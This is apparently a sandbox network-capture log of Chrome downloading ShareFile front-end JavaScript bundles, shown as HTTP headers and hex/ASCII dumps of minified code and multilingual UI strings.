                                                                                                                                                                                                                      2024-11-05 19:36:10 UTC16384INData Raw: 6f 63 29 72 65 74 75 72 6e 20 72 28 69 2e 66 69 6e 61 6c 6c 79 4c 6f 63 29 7d 65 6c 73 65 20 69 66 28 6c 29 7b 69 66 28 74 68 69 73 2e 70 72 65 76 3c 69 2e 63 61 74 63 68 4c 6f 63 29 72 65 74 75 72 6e 20 72 28 69 2e 63 61 74 63 68 4c 6f 63 2c 21 30 29 7d 65 6c 73 65 7b 69 66 28 21 63 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 74 72 79 20 73 74 61 74 65 6d 65 6e 74 20 77 69 74 68 6f 75 74 20 63 61 74 63 68 20 6f 72 20 66 69 6e 61 6c 6c 79 22 29 3b 69 66 28 74 68 69 73 2e 70 72 65 76 3c 69 2e 66 69 6e 61 6c 6c 79 4c 6f 63 29 72 65 74 75 72 6e 20 72 28 69 2e 66 69 6e 61 6c 6c 79 4c 6f 63 29 7d 7d 7d 7d 2c 61 62 72 75 70 74 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 74 68 69 73 2e 74 72 79 45 6e 74 72 69 65 73 2e 6c 65 6e 67 74
                                                                                                                                                                                                                      Data Ascii: oc)return r(i.finallyLoc)}else if(l){if(this.prev<i.catchLoc)return r(i.catchLoc,!0)}else{if(!c)throw Error("try statement without catch or finally");if(this.prev<i.finallyLoc)return r(i.finallyLoc)}}}},abrupt:function(e,t){for(var n=this.tryEntries.lengt
                                                                                                                                                                                                                      2024-11-05 19:36:10 UTC16384INData Raw: 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 74 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 72 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 24 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 31 3b 74 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 7b 76 61 72 20 6e 3d 6e 75 6c 6c 21 3d 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3a 7b 7d 3b 74 25 32 3f 5f 28 4f 62 6a 65 63 74 28 6e 29 2c 21 30 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 28 30 2c 75 2e 41 29 28 65 2c 74 2c 6e 5b 74 5d 29 7d 29 29 3a 4f 62 6a 65 63 74 2e
                                                                                                                                                                                                                      Data Ascii: ction(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),n.push.apply(n,r)}return n}function $(e){for(var t=1;t<arguments.length;t++){var n=null!=arguments[t]?arguments[t]:{};t%2?_(Object(n),!0).forEach((function(t){(0,u.A)(e,t,n[t])})):Object.


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      47192.168.2.174976713.227.219.304437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:10 UTC604OUTGET /sharefile-web/sharefiledev-doc-gen-pilet/1.2.105/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      Origin: https://averellharriman.sharefile.com
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:10 UTC591INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: application/x-javascript
                                                                                                                                                                                                                      Content-Length: 1807333
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Last-Modified: Wed, 23 Oct 2024 09:27:42 GMT
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:11 GMT
                                                                                                                                                                                                                      ETag: "599a89980a09447aff755be20d4eacfd"
                                                                                                                                                                                                                      X-Cache: RefreshHit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 38f6d324a75dff585b0ce25920fd4bda.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS54-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: PT3iigU5OjLOKTJqh68s7l7L1mPuiq-bvzt9JD-gFajDi6AA1-JqKw==
                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://averellharriman.sharefile.com
                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                      2024-11-05 19:36:10 UTC16384INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 64 6f 63 67 65 6e 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 63 69 74 72 69 74 65 2f 73 66 2d 61 70 69 22 2c 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 64 6f 6d 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 2d 64 6f 6d 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 5f 5f 57 45 42 50 41 43 4b 5f 44 59 4e 41 4d 49 43 5f 45 58 50 4f 52 54 5f 5f 2c 5f 5f 73 79 73 74 65 6d 5f 63 6f 6e 74 65 78 74 5f 5f 29 7b 76 61 72 20 5f 5f 57 45 42 50 41 43 4b 5f 45 58 54 45 52 4e 41 4c 5f 4d
                                                                                                                                                                                                                      Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevdocgenpilet,{})System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router-dom","tslib"],(function(__WEBPACK_DYNAMIC_EXPORT__,__system_context__){var __WEBPACK_EXTERNAL_M
                                                                                                                                                                                                                      2024-11-05 19:36:10 UTC16384INData Raw: 74 79 6c 65 22 2c 22 70 72 69 6d 61 72 79 43 6f 6c 6f 72 22 2c 22 73 65 63 6f 6e 64 61 72 79 43 6f 6c 6f 72 22 5d 2c 6d 3d 7b 70 72 69 6d 61 72 79 43 6f 6c 6f 72 3a 22 23 33 33 33 22 2c 73 65 63 6f 6e 64 61 72 79 43 6f 6c 6f 72 3a 22 23 45 36 45 36 45 36 22 2c 63 61 6c 63 75 6c 61 74 65 64 3a 21 31 7d 3b 76 61 72 20 67 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 69 63 6f 6e 2c 6e 3d 65 2e 63 6c 61 73 73 4e 61 6d 65 2c 72 3d 65 2e 6f 6e 43 6c 69 63 6b 2c 61 3d 65 2e 73 74 79 6c 65 2c 6f 3d 65 2e 70 72 69 6d 61 72 79 43 6f 6c 6f 72 2c 6c 3d 65 2e 73 65 63 6f 6e 64 61 72 79 43 6f 6c 6f 72 2c 63 3d 28 30 2c 69 2e 41 29 28 65 2c 68 29 2c 75 3d 73 2e 75 73 65 52 65 66 28 29 2c 64 3d 6d 3b 69 66 28 6f 26 26 28 64 3d 7b 70 72 69 6d 61 72 79 43
                                                                                                                                                                                                                      Data Ascii: tyle","primaryColor","secondaryColor"],m={primaryColor:"#333",secondaryColor:"#E6E6E6",calculated:!1};var g=function(e){var t=e.icon,n=e.className,r=e.onClick,a=e.style,o=e.primaryColor,l=e.secondaryColor,c=(0,i.A)(e,h),u=s.useRef(),d=m;if(o&&(d={primaryC
                                                                                                                                                                                                                      2024-11-05 19:36:11 UTC16384INData Raw: 63 68 65 6e 61 62 6c 61 67 65 20 6b 6f 70 69 65 72 74 22 2c 63 72 65 61 74 65 5f 6c 69 6e 6b 3a 22 4c 69 6e 6b 20 65 72 73 74 65 6c 6c 65 6e 22 2c 63 72 65 61 74 65 5f 6e 65 77 5f 6c 69 6e 6b 3a 22 45 69 6e 65 6e 20 77 65 69 74 65 72 65 6e 20 4c 69 6e 6b 20 65 72 73 74 65 6c 6c 65 6e 22 2c 64 65 6c 65 74 65 5f 6c 69 6e 6b 3a 22 4c 69 6e 6b 20 6c c3 b6 73 63 68 65 6e 22 2c 64 65 6c 65 74 65 5f 6d 6f 64 61 6c 5f 63 61 6e 63 65 6c 5f 74 65 78 74 3a 22 41 62 62 72 65 63 68 65 6e 22 2c 64 65 6c 65 74 65 5f 6d 6f 64 61 6c 5f 63 6f 6e 66 69 72 6d 5f 74 65 78 74 3a 22 4c 69 6e 6b 20 6c c3 b6 73 63 68 65 6e 22 2c 64 65 6c 65 74 65 5f 6d 6f 64 61 6c 5f 6d 65 73 73 61 67 65 3a 22 57 65 6e 6e 20 53 69 65 20 64 69 65 73 65 6e 20 4c 69 6e 6b 20 6c c3 b6 73 63 68 65 6e
                                                                                                                                                                                                                      Data Ascii: chenablage kopiert",create_link:"Link erstellen",create_new_link:"Einen weiteren Link erstellen",delete_link:"Link lschen",delete_modal_cancel_text:"Abbrechen",delete_modal_confirm_text:"Link lschen",delete_modal_message:"Wenn Sie diesen Link lschen
                                                                                                                                                                                                                      2024-11-05 19:36:11 UTC15253INData Raw: 6d 61 72 6b 3a 22 42 65 69 20 45 69 6e 67 61 62 65 20 76 6f 6e 20 4e 61 6d 65 20 75 6e 64 20 45 2d 4d 61 69 6c 2d 41 64 72 65 73 73 65 20 6b 61 6e 6e 20 6a 65 64 65 72 20 6f 68 6e 65 20 41 6e 6d 65 6c 64 75 6e 67 20 65 69 6e 65 20 4b 6f 70 69 65 20 6d 69 74 20 57 61 73 73 65 72 7a 65 69 63 68 65 6e 20 61 6e 7a 65 69 67 65 6e 2e 22 7d 7d 7d 2c 61 6e 61 6c 79 7a 69 6e 67 5f 66 69 6c 65 5f 63 6f 6e 74 65 6e 74 3a 22 44 61 74 65 69 69 6e 68 61 6c 74 20 77 69 72 64 20 61 6e 61 6c 79 73 69 65 72 74 2e 2e 2e 22 2c 61 70 70 6c 79 5f 72 65 63 6f 6d 6d 65 6e 64 65 64 5f 6f 70 74 69 6f 6e 73 3a 22 45 6d 70 66 6f 68 6c 65 6e 65 20 4f 70 74 69 6f 6e 65 6e 20 61 6e 77 65 6e 64 65 6e 22 2c 61 70 70 6c 79 69 6e 67 5f 72 65 63 6f 6d 6d 65 6e 64 65 64 5f 6f 70 74 69 6f 6e
                                                                                                                                                                                                                      Data Ascii: mark:"Bei Eingabe von Name und E-Mail-Adresse kann jeder ohne Anmeldung eine Kopie mit Wasserzeichen anzeigen."}}},analyzing_file_content:"Dateiinhalt wird analysiert...",apply_recommended_options:"Empfohlene Optionen anwenden",applying_recommended_option
                                                                                                                                                                                                                      2024-11-05 19:36:11 UTC16384INData Raw: 64 6f 77 6e 6c 6f 61 64 69 6e 67 20 74 68 65 20 66 69 6c 65 2e 20 53 6f 6d 65 20 66 69 6c 65 20 74 79 70 65 73 20 64 6f 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 76 69 65 77 2d 6f 6e 6c 79 20 73 68 61 72 69 6e 67 20 6f 72 20 77 61 74 65 72 6d 61 72 6b 69 6e 67 2e 22 2c 74 6f 6f 6c 74 69 70 5f 61 62 6f 75 74 5f 76 69 65 77 5f 6f 6e 6c 79 5f 6c 69 6e 6b 3a 22 41 62 6f 75 74 20 76 69 65 77 2d 6f 6e 6c 79 20 73 68 61 72 69 6e 67 22 2c 74 6f 6f 6c 74 69 70 5f 61 62 6f 75 74 5f 77 61 74 65 72 6d 61 72 6b 69 6e 67 5f 6c 69 6e 6b 3a 22 41 62 6f 75 74 20 77 61 74 65 72 6d 61 72 6b 69 6e 67 22 7d 2c 64 6f 77 6e 6c 6f 61 64 73 5f 6c 69 6d 69 74 73 3a 7b 75 6e 6c 69 6d 69 74 65 64 3a 22 55 6e 6c 69 6d 69 74 65 64 22 7d 2c 64 6f 77 6e 6c 6f 61 64 73 5f 70 65 72 5f 75 73
                                                                                                                                                                                                                      Data Ascii: downloading the file. Some file types do not support view-only sharing or watermarking.",tooltip_about_view_only_link:"About view-only sharing",tooltip_about_watermarking_link:"About watermarking"},downloads_limits:{unlimited:"Unlimited"},downloads_per_us
                                                                                                                                                                                                                      2024-11-05 19:36:11 UTC16384INData Raw: 7b 6d 69 6e 75 74 65 73 52 65 6d 61 69 6e 69 6e 67 7d 7d 20 6d 69 6e 20 22 2c 72 65 6d 61 69 6e 69 6e 67 3a 22 51 75 65 64 61 3a 20 7b 7b 72 65 6d 61 69 6e 69 6e 67 54 69 6d 65 44 69 73 70 6c 61 79 7d 7d 20 22 2c 72 65 74 72 79 69 6e 67 3a 22 45 72 72 6f 72 20 64 65 20 63 61 72 67 61 3a 20 52 65 69 6e 74 65 6e 74 61 6e 64 6f 22 2c 73 65 63 6f 6e 64 5f 72 65 6d 61 69 6e 69 6e 67 3a 22 7b 7b 73 65 63 6f 6e 64 73 52 65 6d 61 69 6e 69 6e 67 7d 7d 20 73 20 22 2c 73 68 6f 75 6c 64 6e 74 5f 74 61 6b 65 5f 6c 6f 6e 67 3a 22 45 73 70 65 72 65 20 75 6e 6f 73 20 6d 6f 6d 65 6e 74 6f 73 2e 2e 2e 22 2c 73 74 61 72 74 69 6e 67 5f 75 70 6c 6f 61 64 3a 22 49 6e 69 63 69 61 6e 64 6f 20 6c 61 20 63 61 72 67 61 2e 2e 2e 22 2c 74 72 61 6e 73 66 65 72 5f 70 72 6f 67 72 65 73
                                                                                                                                                                                                                      Data Ascii: {minutesRemaining}} min ",remaining:"Queda: {{remainingTimeDisplay}} ",retrying:"Error de carga: Reintentando",second_remaining:"{{secondsRemaining}} s ",shouldnt_take_long:"Espere unos momentos...",starting_upload:"Iniciando la carga...",transfer_progres
                                                                                                                                                                                                                      2024-11-05 19:36:11 UTC16384INData Raw: 65 6d 61 6e 61 2e 22 2c 61 66 74 65 72 5f 73 69 78 5f 6d 6f 6e 74 68 73 3a 22 45 6c 20 65 6e 6c 61 63 65 20 63 61 64 75 63 61 72 c3 a1 20 61 6c 20 63 61 62 6f 20 64 65 20 73 65 69 73 20 6d 65 73 65 73 2e 22 2c 61 66 74 65 72 5f 74 68 72 65 65 5f 6d 6f 6e 74 68 73 3a 22 45 6c 20 65 6e 6c 61 63 65 20 63 61 64 75 63 61 72 c3 a1 20 61 6c 20 63 61 62 6f 20 64 65 20 74 72 65 73 20 6d 65 73 65 73 2e 22 2c 61 66 74 65 72 5f 78 5f 64 61 79 73 3a 22 45 6c 20 65 6e 6c 61 63 65 20 63 61 64 75 63 61 72 c3 a1 20 61 6c 20 63 61 62 6f 20 64 65 20 7b 7b 64 61 79 73 7d 7d 20 64 2e 22 2c 61 66 74 65 72 5f 79 65 61 72 3a 22 45 6c 20 65 6e 6c 61 63 65 20 63 61 64 75 63 61 72 c3 a1 20 61 6c 20 63 61 62 6f 20 64 65 20 75 6e 20 61 c3 b1 6f 2e 22 2c 6e 65 76 65 72 3a 22 45 6c 20
                                                                                                                                                                                                                      Data Ascii: emana.",after_six_months:"El enlace caducar al cabo de seis meses.",after_three_months:"El enlace caducar al cabo de tres meses.",after_x_days:"El enlace caducar al cabo de {{days}} d.",after_year:"El enlace caducar al cabo de un ao.",never:"El
                                                                                                                                                                                                                      2024-11-05 19:36:11 UTC15108INData Raw: 74 69 70 3a 22 45 78 69 67 65 6e 63 65 73 20 64 27 61 63 63 c3 a8 73 20 61 75 20 6c 69 65 6e 20 61 75 78 71 75 65 6c 6c 65 73 20 73 6f 6e 74 20 73 6f 75 6d 69 73 20 6c 65 73 20 64 65 73 74 69 6e 61 74 61 69 72 65 73 2e 20 4c 65 73 20 75 74 69 6c 69 73 61 74 65 75 72 73 20 65 6d 70 6c 6f 79 c3 a9 73 20 73 6f 6e 74 20 67 c3 a9 6e c3 a9 72 61 6c 65 6d 65 6e 74 20 64 65 73 20 70 65 72 73 6f 6e 6e 65 73 20 61 75 20 73 65 69 6e 20 64 65 20 76 6f 74 72 65 20 65 6e 74 72 65 70 72 69 73 65 2e 22 7d 2c 61 64 64 5f 77 61 74 65 72 6d 61 72 6b 3a 22 41 6a 6f 75 74 65 72 20 75 6e 20 66 69 6c 69 67 72 61 6e 65 22 2c 61 6c 6c 6f 77 5f 72 65 63 69 70 69 65 6e 74 73 3a 7b 65 64 69 74 5f 61 62 6f 75 74 5f 6c 69 6e 6b 3a 22 c3 80 20 70 72 6f 70 6f 73 20 64 65 20 6c 61 20 6d
                                                                                                                                                                                                                      Data Ascii: tip:"Exigences d'accs au lien auxquelles sont soumis les destinataires. Les utilisateurs employs sont gnralement des personnes au sein de votre entreprise."},add_watermark:"Ajouter un filigrane",allow_recipients:{edit_about_link:" propos de la m
                                                                                                                                                                                                                      2024-11-05 19:36:11 UTC1276INData Raw: 20 65 20 70 6f 74 72 61 6e 6e 6f 20 73 63 61 72 69 63 61 72 6c 6f 2e 22 2c 61 62 6f 75 74 5f 74 6f 5f 63 68 65 63 6b 5f 6f 75 74 5f 66 69 6c 65 6e 61 6d 65 3a 22 53 69 20 73 74 61 20 70 65 72 20 65 73 74 72 61 72 72 65 20 27 7b 7b 69 74 65 6d 4e 61 6d 65 7d 7d 27 2e 22 2c 63 68 65 63 6b 65 64 6f 75 74 5f 6d 75 6c 74 69 70 6c 65 5f 61 63 74 69 6f 6e 3a 22 7b 7b 74 69 74 6c 65 7d 7d 20 69 20 66 69 6c 65 3f 22 2c 63 68 65 63 6b 65 64 6f 75 74 5f 6d 75 6c 74 69 70 6c 65 5f 6d 73 67 3a 22 55 6e 6f 20 6f 20 70 69 c3 b9 20 66 69 6c 65 20 73 6f 6e 6f 20 73 74 61 74 69 20 65 73 74 72 61 74 74 69 2e 22 2c 63 68 65 63 6b 65 64 6f 75 74 5f 73 69 6e 67 6c 65 5f 64 61 74 65 3a 22 7b 7b 75 73 65 72 4e 61 6d 65 7d 7d 20 68 61 20 65 73 74 72 61 74 74 6f 20 71 75 65 73 74
                                                                                                                                                                                                                      Data Ascii: e potranno scaricarlo.",about_to_check_out_filename:"Si sta per estrarre '{{itemName}}'.",checkedout_multiple_action:"{{title}} i file?",checkedout_multiple_msg:"Uno o pi file sono stati estratti.",checkedout_single_date:"{{userName}} ha estratto quest
                                                                                                                                                                                                                      2024-11-05 19:36:11 UTC16384INData Raw: 74 7d 7d 20 65 6c 65 6d 65 6e 74 69 22 7d 2c 66 69 6c 65 5f 6c 69 73 74 5f 6d 6f 64 61 6c 3a 7b 64 6f 6e 74 5f 73 68 6f 77 5f 61 67 61 69 6e 3a 22 4e 6f 6e 20 6d 6f 73 74 72 61 72 65 20 71 75 65 73 74 6f 20 6d 65 73 73 61 67 67 69 6f 20 69 6e 20 66 75 74 75 72 6f 22 2c 6d 6f 76 65 5f 61 77 61 79 5f 73 65 6c 65 63 74 69 6f 6e 73 3a 22 53 65 20 73 69 20 61 62 62 61 6e 64 6f 6e 61 20 6c 61 20 63 61 72 74 65 6c 6c 61 20 63 6f 72 72 65 6e 74 65 2c 20 6c 65 20 73 65 6c 65 7a 69 6f 6e 69 20 61 6e 64 72 61 6e 6e 6f 20 70 65 72 73 65 2e 22 7d 2c 67 65 6e 65 72 69 63 5f 65 72 72 6f 72 3a 22 53 69 20 c3 a8 20 76 65 72 69 66 69 63 61 74 6f 20 75 6e 20 65 72 72 6f 72 65 22 2c 67 65 74 5f 61 70 70 72 6f 76 61 6c 3a 7b 61 64 64 5f 61 70 70 72 6f 76 65 72 73 3a 22 41 67
                                                                                                                                                                                                                      Data Ascii: t}} elementi"},file_list_modal:{dont_show_again:"Non mostrare questo messaggio in futuro",move_away_selections:"Se si abbandona la cartella corrente, le selezioni andranno perse."},generic_error:"Si verificato un errore",get_approval:{add_approvers:"Ag


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      48192.168.2.174976913.224.189.1154437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:10 UTC424OUTGET /sharefile-web/sharefiledev-request-list-pilet/1.10.1/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:10 UTC522INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: application/x-javascript
                                                                                                                                                                                                                      Content-Length: 261475
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Last-Modified: Fri, 18 Oct 2024 12:59:52 GMT
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:10 GMT
                                                                                                                                                                                                                      ETag: "48252b007677adfabb0ea62c8028a30e"
                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 3bf3e75bcb9a86b3eb343a1d4392a6de.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: 6kFV17VBHFTyQ7CCdToNZtov7MLYjrDEIMCZVKznZh7HakTz6_eYPQ==
                                                                                                                                                                                                                      Age: 2
                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                      2024-11-05 19:36:10 UTC16384INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 72 65 71 75 65 73 74 6c 69 73 74 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 63 69 74 72 69 74 65 2f 73 66 2d 61 70 69 22 2c 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 64 6f 6d 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 2d 64 6f 6d 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 7b 7d 2c 72 3d 7b 7d 2c 6f 3d 7b 7d 2c 61 3d 7b 7d 2c 69 3d 7b 7d 2c 73 3d 7b 7d 2c 63 3d 7b 7d 2c 75 3d 7b 7d 3b 72 65
                                                                                                                                                                                                                      Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevrequestlistpilet,{})System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router","react-router-dom","tslib"],(function(e,t){var n={},r={},o={},a={},i={},s={},c={},u={};re
                                                                                                                                                                                                                      2024-11-05 19:36:10 UTC16384INData Raw: 6c 61 74 65 28 4f 2c 7a 28 7a 28 7b 7d 2c 74 29 2c 7b 6a 6f 69 6e 41 72 72 61 79 73 3a 21 31 2c 6e 73 3a 6c 7d 29 29 2c 78 5b 53 5d 3d 3d 3d 4f 26 26 28 78 5b 53 5d 3d 67 5b 53 5d 29 7d 67 3d 78 7d 7d 65 6c 73 65 20 69 66 28 49 26 26 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 77 26 26 22 5b 6f 62 6a 65 63 74 20 41 72 72 61 79 5d 22 3d 3d 3d 62 29 28 67 3d 67 2e 6a 6f 69 6e 28 77 29 29 26 26 28 67 3d 74 68 69 73 2e 65 78 74 65 6e 64 54 72 61 6e 73 6c 61 74 69 6f 6e 28 67 2c 65 2c 74 2c 72 29 29 3b 65 6c 73 65 7b 76 61 72 20 5f 3d 21 31 2c 50 3d 21 31 2c 43 3d 76 6f 69 64 20 30 21 3d 3d 74 2e 63 6f 75 6e 74 26 26 22 73 74 72 69 6e 67 22 21 3d 74 79 70 65 6f 66 20 74 2e 63 6f 75 6e 74 2c 6a 3d 6e 2e 68 61 73 44 65 66 61 75 6c 74 56 61 6c 75 65 28 74
                                                                                                                                                                                                                      Data Ascii: late(O,z(z({},t),{joinArrays:!1,ns:l})),x[S]===O&&(x[S]=g[S])}g=x}}else if(I&&"string"==typeof w&&"[object Array]"===b)(g=g.join(w))&&(g=this.extendTranslation(g,e,t,r));else{var _=!1,P=!1,C=void 0!==t.count&&"string"!=typeof t.count,j=n.hasDefaultValue(t
                                                                                                                                                                                                                      2024-11-05 19:36:10 UTC16384INData Raw: 69 6f 6e 28 29 7b 76 61 72 20 65 3d 22 22 2e 63 6f 6e 63 61 74 28 74 68 69 73 2e 70 72 65 66 69 78 2c 22 28 2e 2b 3f 29 22 29 2e 63 6f 6e 63 61 74 28 74 68 69 73 2e 73 75 66 66 69 78 29 3b 74 68 69 73 2e 72 65 67 65 78 70 3d 6e 65 77 20 52 65 67 45 78 70 28 65 2c 22 67 22 29 3b 76 61 72 20 74 3d 22 22 2e 63 6f 6e 63 61 74 28 74 68 69 73 2e 70 72 65 66 69 78 29 2e 63 6f 6e 63 61 74 28 74 68 69 73 2e 75 6e 65 73 63 61 70 65 50 72 65 66 69 78 2c 22 28 2e 2b 3f 29 22 29 2e 63 6f 6e 63 61 74 28 74 68 69 73 2e 75 6e 65 73 63 61 70 65 53 75 66 66 69 78 29 2e 63 6f 6e 63 61 74 28 74 68 69 73 2e 73 75 66 66 69 78 29 3b 74 68 69 73 2e 72 65 67 65 78 70 55 6e 65 73 63 61 70 65 3d 6e 65 77 20 52 65 67 45 78 70 28 74 2c 22 67 22 29 3b 76 61 72 20 6e 3d 22 22 2e 63 6f
                                                                                                                                                                                                                      Data Ascii: ion(){var e="".concat(this.prefix,"(.+?)").concat(this.suffix);this.regexp=new RegExp(e,"g");var t="".concat(this.prefix).concat(this.unescapePrefix,"(.+?)").concat(this.unescapeSuffix).concat(this.suffix);this.regexpUnescape=new RegExp(t,"g");var n="".co
                                                                                                                                                                                                                      2024-11-05 19:36:10 UTC2016INData Raw: 6f 64 75 6c 65 73 2e 69 31 38 6e 46 6f 72 6d 61 74 26 26 28 63 2e 69 31 38 6e 46 6f 72 6d 61 74 3d 6f 28 74 68 69 73 2e 6d 6f 64 75 6c 65 73 2e 69 31 38 6e 46 6f 72 6d 61 74 29 2c 63 2e 69 31 38 6e 46 6f 72 6d 61 74 2e 69 6e 69 74 26 26 63 2e 69 31 38 6e 46 6f 72 6d 61 74 2e 69 6e 69 74 28 74 68 69 73 29 29 2c 74 68 69 73 2e 74 72 61 6e 73 6c 61 74 6f 72 3d 6e 65 77 20 56 28 74 68 69 73 2e 73 65 72 76 69 63 65 73 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 29 2c 74 68 69 73 2e 74 72 61 6e 73 6c 61 74 6f 72 2e 6f 6e 28 22 2a 22 2c 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 2c 72 3d 6e 65 77 20 41 72 72 61 79 28 6e 3e 31 3f 6e 2d 31 3a 30 29 2c 6f 3d 31 3b 6f 3c 6e 3b 6f 2b 2b 29 72 5b 6f
                                                                                                                                                                                                                      Data Ascii: odules.i18nFormat&&(c.i18nFormat=o(this.modules.i18nFormat),c.i18nFormat.init&&c.i18nFormat.init(this)),this.translator=new V(this.services,this.options),this.translator.on("*",(function(t){for(var n=arguments.length,r=new Array(n>1?n-1:0),o=1;o<n;o++)r[o
